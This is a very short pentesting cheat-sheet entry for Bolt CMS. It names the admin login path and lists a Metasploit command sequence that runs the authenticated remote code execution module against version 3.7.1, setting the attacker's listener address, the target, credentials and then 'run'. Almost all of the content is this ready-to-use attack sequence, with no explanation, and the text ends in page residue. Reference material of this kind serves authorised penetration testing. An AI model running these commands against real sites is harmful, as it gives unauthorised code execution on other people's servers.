Bolt CMS Pentesting
Login Page
/boltRemote Code Execution (v3.7.1)
msfconsole
msf> use exploit/unix/webapp/bolt_authenticated_rce
msf> set lhost <local-ip>
msf> set rhosts <target-ip>
msf> set username <username>
msf> set password <password>
msf> runLast updated